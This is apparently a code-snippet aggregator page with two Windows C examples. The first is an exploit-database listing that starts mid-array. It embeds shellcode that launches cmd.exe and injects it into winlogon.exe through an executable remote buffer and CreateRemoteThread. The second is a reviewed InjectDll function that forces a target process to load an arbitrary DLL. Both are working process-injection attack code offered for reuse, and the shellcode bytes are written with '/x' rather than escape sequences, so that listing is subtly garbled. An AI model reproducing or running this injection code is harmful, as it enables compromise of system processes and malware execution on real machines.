        "/xfc/xe8/x89/x00/x00/x00/x60/x89/xe5/x31/xd2/x64/x8b/x52/x30"
        "/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff"
        "/x31/xc0/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2"
        "/xf0/x52/x57/x8b/x52/x10/x8b/x42/x3c/x01/xd0/x8b/x40/x78/x85"
        "/xc0/x74/x4a/x01/xd0/x50/x8b/x48/x18/x8b/x58/x20/x01/xd3/xe3"
        "/x3c/x49/x8b/x34/x8b/x01/xd6/x31/xff/x31/xc0/xac/xc1/xcf/x0d"
        "/x01/xc7/x38/xe0/x75/xf4/x03/x7d/xf8/x3b/x7d/x24/x75/xe2/x58"
        "/x8b/x58/x24/x01/xd3/x66/x8b/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b"
        "/x04/x8b/x01/xd0/x89/x44/x24/x24/x5b/x5b/x61/x59/x5a/x51/xff"
        "/xe0/x58/x5f/x5a/x8b/x12/xeb/x86/x5d/x6a/x01/x8d/x85/xb9/x00"
        "/x00/x00/x50/x68/x31/x8b/x6f/x87/xff/xd5/xbb/xe0/x1d/x2a/x0a"
        "/x68/xa6/x95/xbd/x9d/xff/xd5/x3c/x06/x7c/x0a/x80/xfb/xe0/x75"
        "/x05/xbb/x47/x13/x72/x6f/x6a/x00/x53/xff/xd5/x63/x6d/x64/x2e"
        "/x65/x78/x65/x00";

    wchar_t* targetImage = L"winlogon.exe";
    DWORD targetPid = getProcessId(targetImage);
    HANDLE hTarget = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);

    // One page, writable and executable, inside the target process.
    void* remoteBuffer = VirtualAllocEx(hTarget, NULL, 0x1000,
                                        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    DWORD writeResult = WriteProcessMemory(hTarget, remoteBuffer, shellcode, sizeof(shellcode), 0);
    HANDLE remoteThread = CreateRemoteThread(hTarget, NULL, 0,
                                             (LPTHREAD_START_ROUTINE)remoteBuffer,
                                             NULL, 0, NULL);
}
开发者ID:0x24bin,项目名称:exploit-database,代码行数:26,
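// Example 16: InjectDll
/**
 * Makes process `dwPID` call LoadLibraryW(szDllPath) on a remote thread and
 * waits for that thread to finish.
 *
 * Fixes relative to the original listing:
 *  - VirtualAllocEx, WriteProcessMemory, GetProcAddress and CreateRemoteThread
 *    are checked; the original returned TRUE whatever they did and waited on a
 *    possibly NULL thread handle;
 *  - the process handle and the remote buffer are released on every path;
 *  - the failure message prints the DWORD id with %lu and ends in a real
 *    newline (it was printed with %d and "/n").
 *
 * NOTE(review): LoadLibraryW expects a wide-character path, so the call is
 * only correct when TCHAR is wchar_t, i.e. in a UNICODE build.
 *
 * @param dwPID      Id of the target process.
 * @param szDllPath  NUL-terminated path of the library.
 * @return TRUE when the remote thread was created and waited for, FALSE
 *         otherwise. The result of the remote LoadLibraryW call itself is not
 *         inspected.
 */
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
    if ( szDllPath == NULL )
        return FALSE;

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
    if ( !hProcess )
    {
        printf("OpenProcess(%lu) failed!!!\n", dwPID);
        return FALSE;
    }

    // Size in bytes of the path, terminator included.
    const DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1) * sizeof(TCHAR);
    BOOL bStarted = FALSE;

    LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
    if ( pRemoteBuf != NULL )
    {
        if ( WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL) )
        {
            LPTHREAD_START_ROUTINE pThreadProc = (LPTHREAD_START_ROUTINE)
                GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
            HANDLE hThread = pThreadProc
                ? CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL)
                : NULL;

            if ( hThread != NULL )
            {
                WaitForSingleObject(hThread, INFINITE);
                CloseHandle(hThread);
                bStarted = TRUE;
            }
        }

        // Either no thread was started or it has exited, so nothing reads the buffer.
        VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);
    }

    CloseHandle(hProcess);
    return bStarted;
}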
开发者ID:junehappylove,项目名称:GitHub,代码行数:33,